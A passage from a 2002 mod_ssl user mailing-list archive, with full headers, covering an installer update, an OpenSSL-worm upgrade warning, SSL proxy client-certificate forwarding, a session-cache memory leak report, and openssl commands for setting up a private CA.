Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 16 21:46:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25345; Wed, 16 Oct 2002 21:45:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from krusty.unitec.edu.ve id VAA25278; Wed, 16 Oct 2002 21:44:32 +0200 (MET DST)
Received: from [150.100.15.1] (200.35.82.243 [200.35.82.243]) by krusty.unitec.edu.ve with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)
	id 4KGL9VZC; Wed, 16 Oct 2002 15:56:13 -0400
Subject: [OFF-TOPIC] Apache 2 + SSL Binaries for Windows
From: Victor Medina 
To: modssl-users@modssl.org
In-Reply-To: <1034716067.8326.28.camel@beta.trusts.caribou.homelinux.org>
References: <1034716067.8326.28.camel@beta.trusts.caribou.homelinux.org>
Content-Type: multipart/alternative; boundary="=-lkIdkoG6z9Ed+L16Rj+B"
X-Mailer: Ximian Evolution 1.0.8 
Date: 16 Oct 2002 15:45:12 -0400
Message-Id: <1034797520.4291.4.camel@stimpy.rbs.com>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victor Medina 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--=-lkIdkoG6z9Ed+L16Rj+B
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hi Guys!!

I just updated the server installer to fix a small but important bug
with setup software.
The installer is as usual at:

ftp://route.unitec.edu.ve/victormedina/ikiruxproject

I as always appreciate feedback and bugs or just comments

Best Regards!

__________________________________________________________
Victor Medina M   -  Route Learning Web Designer and Senior Java
Programmer
Real Business Solutions, Inc.

phone: 58245-5646677 EXT: 269
cellphone: 0416-8494395
e-mail: vmedina98@unitec.edu.ve
web: http://unitec.edu.ve
usuario linux: #145671
__________________________________________________________

--=-lkIdkoG6z9Ed+L16Rj+B
Content-Type: text/html; charset=utf-8




  
  


Hi Guys!!





I just updated the server installer to fix a small but important bug with setup software.


The installer is as usual at:





ftp://route.unitec.edu.ve/victormedina/ikiruxproject





I as always appreciate feedback and bugs or just comments





Best Regards!








__________________________________________________________


Victor Medina M   -  Route Learning Web Designer and Senior Java Programmer


Real Business Solutions, Inc.





phone: 58245-5646677 EXT: 269


cellphone: 0416-8494395


e-mail: vmedina98@unitec.edu.ve


web: http://unitec.edu.ve


usuario linux: #145671


__________________________________________________________









--=-lkIdkoG6z9Ed+L16Rj+B--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 16 21:59:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25892; Wed, 16 Oct 2002 21:58:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id VAA25874; Wed, 16 Oct 2002 21:57:14 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g9GJoGRp000665;
	Wed, 16 Oct 2002 15:50:16 -0400
Date: Wed, 16 Oct 2002 15:50:16 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Lance Uyehara 
cc: modssl-users@modssl.org
Subject: Re: apache core
In-Reply-To: <4.3.2.7.2.20021016123558.056df380@mail>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 16 Oct 2002, Lance Uyehara wrote:

> I am running apache 1.3.22 and mod_ssl-2.8.5-1.3.22, and have had a few
> cores recently. They all have the same backtrace:

You're probably being probed by the openssl worm.  You need to upgrade to
all the latest versions, as there are a number of remotely exploitable
flaws in the versions you have.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 16 22:15:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26312; Wed, 16 Oct 2002 22:14:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc02.attbi.com id WAA26306; Wed, 16 Oct 2002 22:14:01 +0200 (MET DST)
Received: from taz.verniernetworks.com ([12.234.49.69])
          by sccrmhc02.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20021016201354.EIII12986.sccrmhc02.attbi.com@taz.verniernetworks.com>
          for ; Wed, 16 Oct 2002 20:13:54 +0000
Message-Id: <4.3.2.7.2.20021016131251.056d4450@127.0.0.1>
X-Sender: lance@127.0.0.1 (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 16 Oct 2002 13:13:52 -0700
To: modssl-users@modssl.org
From: Lance Uyehara 
Subject: Re: apache core
In-Reply-To: 
References: <4.3.2.7.2.20021016123558.056df380@mail>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lance Uyehara 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 03:50 PM 10/16/02 -0400, Cliff Woolley wrote:
>On Wed, 16 Oct 2002, Lance Uyehara wrote:
>
> > I am running apache 1.3.22 and mod_ssl-2.8.5-1.3.22, and have had a few
> > cores recently. They all have the same backtrace:
>
>You're probably being probed by the openssl worm.  You need to upgrade to
>all the latest versions, as there are a number of remotely exploitable
>flaws in the versions you have.

Thanks! I really appreciate the quick response.

-Lance

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 17 18:31:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28289; Thu, 17 Oct 2002 18:30:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA28211; Thu, 17 Oct 2002 18:29:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 3E81F4CE764; Thu, 17 Oct 2002 18:29:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3DA0C286C5; Thu, 17 Oct 2002 18:23:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla1.xs4all.nl id QAA25840; Thu, 17 Oct 2002 16:59:36 +0200 (MET DST)
Received: from diagram.nl (213-84-171-61.adsl.xs4all.nl [213.84.171.61])
	by smtpzilla1.xs4all.nl (8.12.0/8.12.0) with ESMTP id g9HExTQh022871
	for ; Thu, 17 Oct 2002 16:59:35 +0200 (CEST)
Received: from Spooler by diagram.nl (Mercury/32 v3.21c) ID MO000174;
  17 Oct 02 17:00:21 +0100
Received: from spooler by diagram.nl (Mercury/32 v3.21c); 17 Oct 02 16:59:48 +0100
From: "Edwin Cleton" 
To: modssl-users@modssl.org
Date: Thu, 17 Oct 2002 16:56:01 +0100
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: RE: [Fwd: Sol: Re: Apache.exe generates errors and is closed by W
Message-ID: <7CAB84834245@diagram.nl>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edwin Cleton" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Fyi,

win32 users, with each upgrade of mod_ssl, don't forget the openssl "*eay32.dll"
files in your system32 directory.

Ecl.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 17 18:31:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28292; Thu, 17 Oct 2002 18:30:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA28210; Thu, 17 Oct 2002 18:29:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2EC924CE75F; Thu, 17 Oct 2002 18:29:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2D946287CB; Thu, 17 Oct 2002 18:24:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpde02.sap-ag.de id SAA27416; Thu, 17 Oct 2002 18:04:38 +0200 (MET DST)
Received: from sap-ag.de (smtpde02)
  by smtpde02.sap-ag.de (out) with ESMTP id QAA08626;
  Thu, 17 Oct 2002 16:19:01 +0200 (MESZ)
Message-Id: <200210171418.QAA00202@hw1464.wdf.sap-ag.de>
Date: Thu, 17 Oct 2002 16:23:47 +0200
From: Maik Mueller 
To: modssl-users@modssl.org
Cc: ccampetto@sogei.it, girl_intin_oss@yahoo.com, rse@engelschall.com,
        maik@sap.com
Subject: SSLProxy* directives (mod_ssl + mod_proxy + mod_headers)
X-Mailer: Maik Mueller's registered AK-Mail 3.11 [ger]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-SAP: out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maik Mueller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I want to share my latest experiences using mod_ssl + mod_proxy +
mod_headers with you.

We are talking about the following scenario:
Component:	Web Browser --- Proxy (mod_proxy)       --- Web Server
SSL Role:	SSL Client  --- SSL server | SSL Client --- SSL Server

This works with Apache 1.3 (compiled with SSL_EXPERIMENTAL flag) and with
Apache 2.0.

A pitfall is that mod_proxy reads its private key AND its certificate from
the file referenced by SSLProxyMachineCertificateFile.
There seems to be no possibility to have separate files for private key and
certificate. I personally would prefer adding the option
SSLProxyMachineKeyFile.
Do you agree that that would make configuration easier?

The next problem was how to transfer the Web browser's Client Certificate to
the Web server:
Component:	Web Browser --- Proxy (mod_proxy)       --- Web Server
SSL Role:	SSL Client  --- SSL server | SSL Client --- SSL Server
				Client Cert --> transfer e. g. as HTTP Header

I tried to solve this problem using mod_headers, but I wasn't successful.
Apache 1.3 mod_headers seems to be unable to expand environment variables.
Apache 2.0 mod_headers can set Headers with variables like this:
Header set OriginalClientCert "%{SSL_CLIENT_CERT}e"'
But the Web server receives only the Request Headers set with
RequestHeader... and Apache 2.0 mod_headers seems to be unable to expand
environment variables in Request Headers.

Thus I come to the following conclusion (Correct me if I'm wrong!): There is
no way to transfer the Web browser's Client Certificate to the Web server
using mod_headers.

The Stronghold Web server has an enhanced mod_proxy functionality, like Joe
Orton told me. You can set Headers using the following command:
SSLProxyPassEnv MyHeaderName %{SSL_CLIENT_CERT}

IMHO the best solution for the Apache Web server would be to enhance
mod_proxy with the functionality to set Headers based on environment
variables like Stronghold did.

Have I overlooked something?
Is there an easy way to pass the Web browser's client certificate to the Web
server?

Any feedback welcome.

Regards,
	Maik
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 02:43:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA14795; Fri, 18 Oct 2002 02:42:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id CAA14791; Fri, 18 Oct 2002 02:42:01 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9I0fxiX009918;
	Fri, 18 Oct 2002 02:42:00 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9I0fwr3009917;
	Fri, 18 Oct 2002 02:41:58 +0200 (IST)
Date: Fri, 18 Oct 2002 02:41:58 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Memory leak in session caching?
Message-ID: <20021018004158.GA9550@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Hebrew-Date: 12 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've come across an apparent bug that I'm surprised no-one come across
before: Mod_ssl's SSL-session cache handling, both the shmht and shmcb
variants, leaks memory. Not directly (there's no alloc calls in shmcb),
but memory is definitely leaked.

Is this a known bug?

Here are the details on how to reproduce it, and a bit about my guesses
about what's causing this bug:

Try the following: make https requests to an Apache1+mod_ssl server (use
a single-process httpd -X for easier monitoring). The server's memory use
will grow and grow, apparently without stopping, over time. The growth
is relatively slow, but definitely noticible. The growth doesn't happen
when session caching is switched off in the configuration file. The growth
becomes alarmingly quick when the requests are made with client-
authentication (in which case the SSL session objects are much larger).

In fact, in one test, a server with 128MB RAM and configured to use a 5 MB
shared memory (shmht) session cache, was made to exhaust all its memory
and start thrashing in a little less than a minute of stressing it with
client-authenticated https requests; With the same server, and the same
load, but with session caching disabled, the server withstood admiringly
well and an abundance of memory was left.

Monitoring the memory use during the aforementioned test, it was easy to
see how each of Apache's processes (about 50-100 were used during that
high load) was growing and growing, until in about a minute all memory was
finished and intensive paging activity started. This is a good sign of a
memory leak :(

The memory growth cannot be attributed to the shared-memory cache itself
getting gradually filled, because it was only 5 MB large. It had to be
something else. What?

My guess, and I hoped that one of the more experienced people on this
list can help me verify/disprove it, and perhaps even fix this apparent
bug, is that OpenSSL is wasting all that memory. My guess is that though
mod_ssl has "callback functions" implementing an external cache (dbm, shmht,
shmct, and recently distcache) it still keeps its own per-process cache.

This per-process cache is obviously useless for Apache (there's a tiny chance
that a second connection will reach the same process again), but by default
(see SSL_CTX_sess_set_cache_size(3)) as many as 20,000 sessions are kept
in that cache. Even if Apache's configuration is to kill a process after as
little as, say, 1000 connections, this can mean that each process may be
wasting this number of session objects, of sizes 100-1000 bytes. Multiply
100 processes by 1000 sessions by 100-1000 bytes, and you get a total memory
waste of 10MB-100MB...

Even if this guess is wrong, something is definitely leaking memory. Maybe
it's a plain-old-memory-leak inside OpenSSL, but I wasn't able to prove
that (I tried valgrind, which claimed that CRYPTO_malloc was the one that
allocated the leaked memory, but that wasn't much help in finding the
real problem inside OpenSSL. Valgrind also showed me that the growing
memory use was not leaked per se - something was still pointing to it.
But there is no plausible excuse why OpenSSL should be keeping around a
quickly growing state in each process).

If this is something that some mod_ssl developer is planning to look into,
I'd be glad to help in any way I can, and can tell you of more tests and
guesses I've made.

Thanks,
	Nadav.


-- 
Nadav Har'El                        |     Friday, Oct 18 2002, 12 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |This signature was intentionally left
http://nadav.harel.org.il           |boring.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 03:31:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA16033; Fri, 18 Oct 2002 03:30:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.brie.com id DAA15961; Fri, 18 Oct 2002 03:29:54 +0200 (MET DST)
Received: (from brian@localhost)
	by darkstar.brie.com (8.9.3/8.9.3/Debian 8.9.3-21) id SAA03854
	for modssl-users@modssl.org; Thu, 17 Oct 2002 18:29:52 -0700
Date: Thu, 17 Oct 2002 18:29:52 -0700
From: Brian Lavender 
To: modssl-users@modssl.org
Subject: Configuring my own CA
Message-ID: <20021017182952.A3841@brie.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brian Lavender 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am trying to configure my web server so when user brian attempts
to connect to https://myhost/brian/ it authenticates him via his
certificate and it allows him to view the directory. I successfully
compiled apache + modssl with a test certificate signed by
Snake Oil. So, here goes on the questions.

Do I need to create my own Certificate Authority? If I create my
own CA, how do I get Netscape to use it as a CA? I am using Netscape
4.7 on Solaris. If I create my own CA, does my Apache/modssl server perform
that function?

Do I need to create a certificate for Brian? Does it have to be signed 
by the CA? 

Here are the answers I came up with so far.

It looks like I need to create a CA and that I can run it on the my modssl
alongside the server.crt. Here is how I created the CA

$ openssl genrsa -des3 -out ca.key 1024 

I created a self signed CA certificate.

$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt 

So this created my certificate authority certificate.

I created at server.key. The CN for the server.key is the FQDN of
my modssl web server.

$ openssl genrsa -des3 -out server.key 1024

I created a request (server.csr) using that server key.

openssl req -new -key server.key -out server.csr 

Then I signed the server key with the command:

$ ./sign.sh server.csr 

which produced a server.crt file. So, it looks like I have a CA and the
server certificate. 

I create a key for myself which I signed using the CA.

$ openssl genrsa -des3 -out brian.key 1024
$ openssl req -new -key brian.key -out brian.csr
$ sign.sh brian.csr 

Then I end up with the following files. 

brian.crt      ca.crt         ca.db.serial   server.crt
brian.csr      ca.db.certs/   ca.key         server.csr
brian.key      ca.db.index    file.p12       server.key

I can't seem to import my key (brian.crt) into my Netscape browser
though. Is there some other format I need to import it into?

brian
-- 
Brian Lavender
http://www.brie.com/brian/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 04:43:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA17723; Fri, 18 Oct 2002 04:42:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR003.sc1.videotron.ca id EAA17719; Fri, 18 Oct 2002 04:41:56 +0200 (MET DST)
Received: from dopey.geoffnet
 (modemcable188.196-202-24.mtl.mc.videotron.ca [24.202.196.188])
 by VL-MS-MR003.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H45008MUOTUBC@VL-MS-MR003.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 17 Oct 2002 22:41:54 -0400 (EDT)
Date: Thu, 17 Oct 2002 22:41:54 -0400
From: Geoff Thorpe 
Subject: Re: Memory leak in session caching?
In-reply-to: <20021018004158.GA9550@fermat.math.technion.ac.il>
To: modssl-users@modssl.org
Cc: "Nadav Har'El" 
Message-id: <200210172241.54084.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <20021018004158.GA9550@fermat.math.technion.ac.il>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

On Thursday 17 Oct 2002 8:41 pm, Nadav Har'El wrote:
> I've come across an apparent bug that I'm surprised no-one come
> across before: Mod_ssl's SSL-session cache handling, both the shmht
> and shmcb variants, leaks memory. Not directly (there's no alloc
> calls in shmcb), but memory is definitely leaked.
>
> Is this a known bug?

I saw your related email on the openssl lists recently but have not had 
the time to reply (and search out the necessary links). Anyway, this 
may not do it justice, but w.r.t. turning of process-local 
openssl-internal cachine, see the following;
   http://marc.theaimsgroup.com/?l=apache-modssl&m=99717585106420&w=2

The issue isn't just memory footprint (though you're right, that can 
also become an unecessary issue) but in fact is security as well. If a 
session needs to be deleted or marked non-resumable, it's too late if 
one of the other processes has cached it locally - so when plugging in 
external caching hooks to openssl, mod_ssl should also turn off the 
process-local caching. End of story.

This has apparently been fixed in Apache 2 but hasn't (IIRC) in mod_ssl. 
I mentioned it more than once, so I've given up.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 05:18:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA19063; Fri, 18 Oct 2002 05:17:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mx4.ust.hk id FAA19037; Fri, 18 Oct 2002 05:16:44 +0200 (MET DST)
Received: from ust.hk (ccz330.ust.hk [143.89.103.167])
	by mx4.ust.hk (8.12.6/8.12.6) with ESMTP id g9I3Gd67012487
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NOT);
	Fri, 18 Oct 2002 11:16:39 +0800 (HKT)
Message-ID: <3DAF7D16.8060303@ust.hk>
Date: Fri, 18 Oct 2002 11:16:38 +0800
From: Leung Ming Tak 
Organization: HKUST
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: ocsp
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leung Ming Tak 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Is there anyone working on ocsp extension for modssl?

Rgds.
Martin

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 07:02:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA21237; Fri, 18 Oct 2002 07:01:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id HAA21232; Fri, 18 Oct 2002 07:00:45 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g9I50ea09036
	for ; Fri, 18 Oct 2002 07:00:42 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Fri Oct 18 07:00:40 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 18 Oct 2002 07:00:39 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 18 Oct 2002 07:00:39 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 18 Oct 2002 07:00:39 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Configuring my own CA
Date: Fri, 18 Oct 2002 07:00:38 +0200
Message-ID: 
Thread-Topic: Configuring my own CA
Thread-Index: AcJ2RiyXs1Brz9jARsembQhuC/LyswAHKXEg
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 18 Oct 2002 05:00:39.0131 (UTC) FILETIME=[4D58F2B0:01C27663]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id HAA21233
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Brian

Netscape needs a pckcs12 format.

I emailed the openssl list on the 16/10/2002 with subject "Re: CSR/CA
Issued Certificate"
where among other things I show how to create CA,server and client
certificates (not keys) and how to convert them to PKSC12 format and
import them into the browser.

Cheers
Jose


-----Original Message-----
From: Brian Lavender [mailto:brian@brie.com]
Sent: 18 October 2002 03:30
To: modssl-users@modssl.org
Subject: Configuring my own CA


I am trying to configure my web server so when user brian attempts
to connect to https://myhost/brian/ it authenticates him via his
certificate and it allows him to view the directory. I successfully
compiled apache + modssl with a test certificate signed by
Snake Oil. So, here goes on the questions.

Do I need to create my own Certificate Authority? If I create my
own CA, how do I get Netscape to use it as a CA? I am using Netscape
4.7 on Solaris. If I create my own CA, does my Apache/modssl server
perform
that function?

Do I need to create a certificate for Brian? Does it have to be signed

by the CA? 

Here are the answers I came up with so far.

It looks like I need to create a CA and that I can run it on the my
modssl
alongside the server.crt. Here is how I created the CA

$ openssl genrsa -des3 -out ca.key 1024 

I created a self signed CA certificate.

$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt 

So this created my certificate authority certificate.

I created at server.key. The CN for the server.key is the FQDN of
my modssl web server.

$ openssl genrsa -des3 -out server.key 1024

I created a request (server.csr) using that server key.

openssl req -new -key server.key -out server.csr 

Then I signed the server key with the command:

$ ./sign.sh server.csr 

which produced a server.crt file. So, it looks like I have a CA and
the
server certificate. 

I create a key for myself which I signed using the CA.

$ openssl genrsa -des3 -out brian.key 1024
$ openssl req -new -key brian.key -out brian.csr
$ sign.sh brian.csr 

Then I end up with the following files. 

brian.crt      ca.crt         ca.db.serial   server.crt
brian.csr      ca.db.certs/   ca.key         server.csr
brian.key      ca.db.index    file.p12       server.key

I can't seem to import my key (brian.crt) into my Netscape browser
though. Is there some other format I need to import it into?

brian
-- 
Brian Lavender
http://www.brie.com/brian/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 10:22:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA27825; Fri, 18 Oct 2002 10:21:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from madimc2.indra.es id KAA27818; Fri, 18 Oct 2002 10:20:27 +0200 (MET DST)
Received: from madarrclex5.indra.es ([192.168.10.22]) by madimc2.indra.es with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 18 Oct 2002 10:12:27 +0200
Received: from madtormail2.indra.es ([172.30.100.17]) by madarrclex5.indra.es with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 18 Oct 2002 10:18:05 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Subject: Apache spawns too many processes
Content-Transfer-Encoding: quoted-printable
X-MIMEOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
Date: Fri, 18 Oct 2002 10:18:05 +0200
Message-ID: 
Thread-Topic: Apache spawns too many processes
Thread-Index: AcJ2f+GIoCTJDF8lROS4TA4csKHLhA==
From: "Garzon Maldonado, Jesus Javier" 
To: 
X-OriginalArrivalTime: 18 Oct 2002 08:18:05.0376 (UTC) FILETIME=[E2427C00:01C2767E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Garzon Maldonado, Jesus Javier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users






Apache spawns too many processes





Hello all:




I have running Apache =
2.0.35+mod_ssl+mod_rewrite+mod_php in a FreeBSD 4.4 box.




Though the number of spare servers and =
threads is restricted in the httpd.conf file, when users browses across =
the web site the number off httpd processes running (as nobody user) =
grows continously consuming all the CPU time.



This doesn't happen if I launch Apache =
with /apachectl start.




How can I solve this problem?.




Thanks in advance.





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 18 23:54:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA21793; Fri, 18 Oct 2002 23:53:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.brie.com id XAA21783; Fri, 18 Oct 2002 23:52:13 +0200 (MET DST)
